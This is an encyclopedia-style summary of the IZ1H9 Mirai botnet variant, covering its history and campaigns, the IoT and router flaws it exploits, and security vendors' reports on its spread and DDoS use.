Iz1h9

IZ1H9 is a variant of the Mirai botnet, discovered in August 2018 and recognized as one of the most active Mirai variants. This malware targets Internet-of-Things (IoT) networks, exploiting flaws in various products to infect systems. The malware has been involved in multiple campaigns since its discovery, including one that targeted Danish critical infrastructure. IZ1H9 spreads through HTTP, SSH, and Telnet protocols, compromising devices to enlist them into its Distributed Denial of Service (DDoS) swarm, which then launches attacks on specified targets. Unit 42 researchers have observed multiple campaigns using the Mirai IZ1H9 variant since November 2021. The malware exploits several flaws dating from 2015 to 2023, with one campaign targeting an unspecified CVE related to the "/cgi-bin/login.cgi" route, potentially affecting the Prolink PRC2402M router. After exploiting these vulnerabilities, an IZ1H9 payload is injected into the device, containing a command to fetch a shell script downloader named "l.sh" from a specified URL. In September 2023, FortiGuard Labs, the research arm of security firm Fortinet, reported a significant evolution in the IZ1H9 Mirai-based DDoS campaign. The malware added thirteen new payloads to target Linux-based routers and routers from manufacturers such as D-Link, Zyxel, TP-Link, TOTOLINK, among others. The impact of the IZ1H9 Campaign is amplified by the rapid updates to the vulnerabilities it exploits. Once an attacker gains control of a vulnerable device, they can incorporate these newly compromised devices into their botnet, enabling them to launch further attacks like DDoS attacks and brute-force.